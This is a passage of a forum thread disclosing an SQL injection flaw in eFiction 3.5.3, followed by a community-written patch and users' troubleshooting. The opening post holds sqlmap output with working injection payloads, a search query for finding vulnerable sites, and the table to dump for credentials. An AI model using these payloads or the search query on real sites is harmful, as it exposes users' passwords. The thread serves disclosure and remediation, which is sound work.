SQL Injection vulne...
 
Notifications
Clear all

[Sticky] SQL Injection vulnerability in eFiction

27 Posts
13 Users
0 Reactions
17.9 K Views
(@guest14424)
Posts: 0
 

Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

    $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

    $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
    ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

    sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
    ---
    Place: GET
    Parameter: seriesid
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

        Type: error-based
        Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
        Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
    ---
    [20:37:41] [INFO] testing MySQL
    [20:37:42] [INFO] confirming MySQL
    [20:37:45] [INFO] the back-end DBMS is MySQL
    [20:37:45] [INFO] fetching banner
    [20:37:45] [INFO] retrieving the length of query output
    [20:37:45] [INFO] retrieved: 20
    [20:38:25] [INFO] retrieved: 5.1.69-community-log
    [20:38:25] [INFO] actively fingerprinting MySQL
    [20:38:28] [INFO] executing MySQL comment injection fingerprint
    web application technology: Apache, PHP 5.2.17
    back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
              banner parsing fingerprint: MySQL 5.1.69, logging enabled
    banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

    inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

... Robert


 
Posted : 12/11/2014 8:46 pm
(@sheepcontrol)
Posts: 332
Reputable Member
 

UPDATE: zip-archive attached with the modified files.

Thanks for letting us know, here's a fix, and YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  return $dbconnect->real_escape_string($str);
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
  if (!is_array($str)) return $dbconnect->real_escape_string($str);
  return array_map('escapestring', $str);
}

(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
  if(version_compare(phpversion(),"4.3.0")=="-1") {
    $str = mysql_escape_string($str);
  } else {
    $str = mysql_real_escape_string($str);
  }
  return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
  if (!is_array($str)) return mysql_real_escape_string($str);
  else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:

include(_BASEDIR."includes/pagesetup.php");


$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is, which has to do with the fact that I am not really into the 3.5.3 code, I merely took the project over with the intention of bringing it to version 5.0.0, which is underway, but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.


 
Posted : 13/11/2014 5:31 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

Ran a test, because $seriesid is straight forward used to build links, it still shows up as injected, but the actual DB query is safe.


 
Posted : 13/11/2014 7:31 am
(@kaehana)
Posts: 3
New Member
 

I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?


 
Posted : 13/11/2014 8:51 am
(@purpleyin)
Posts: 16
Active Member
 

(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
  if(version_compare(phpversion(),"4.3.0")=="-1") {
    $str = mysql_escape_string($str);
  } else {
    $str = mysql_real_escape_string($str);
  }
  return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
  if (!is_array($str)) return mysql_real_escape_string($str);
  else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?


 
Posted : 13/11/2014 8:54 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks


 
Posted : 13/11/2014 9:25 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.


 
Posted : 13/11/2014 9:26 am
(@kaehana)
Posts: 3
New Member
 

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now its ok


 
Posted : 13/11/2014 10:10 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

Thanks for the feedback, good to know.


 
Posted : 13/11/2014 10:27 am
(@darklight)
Posts: 170
Estimable Member
 

Thank you for getting on this so quick!


 
Posted : 13/11/2014 11:39 am
(@kaehana)
Posts: 3
New Member
 

Series doesnt show whit

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get error in line 39 viewseries.php.

But its ok if I use:

$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I dont know if it is ok to use this last code


 
Posted : 13/11/2014 11:53 am
(@sheepcontrol)
Posts: 332
Reputable Member
 

Series doesnt show whit

$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get error in line 39 viewseries.php.

But its ok if I use:

$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I dont know if it is ok to use this last code

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.


 
Posted : 13/11/2014 12:08 pm
 Sue
(@sue)
Posts: 131
Estimable Member
 

Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.


 
Posted : 13/11/2014 3:48 pm
(@charl)
Posts: 17
Active Member
 

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!


 
Posted : 13/11/2014 6:05 pm
(@sheepcontrol)
Posts: 332
Reputable Member
 

A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if you files did indeed differ, that's strange.
Anyway, couldn't sleep so made the hotfix, full package including a few other fixes that came up within the next days, got family festivities coming my way.


 
Posted : 13/11/2014 9:54 pm
Page 1 / 2
Share: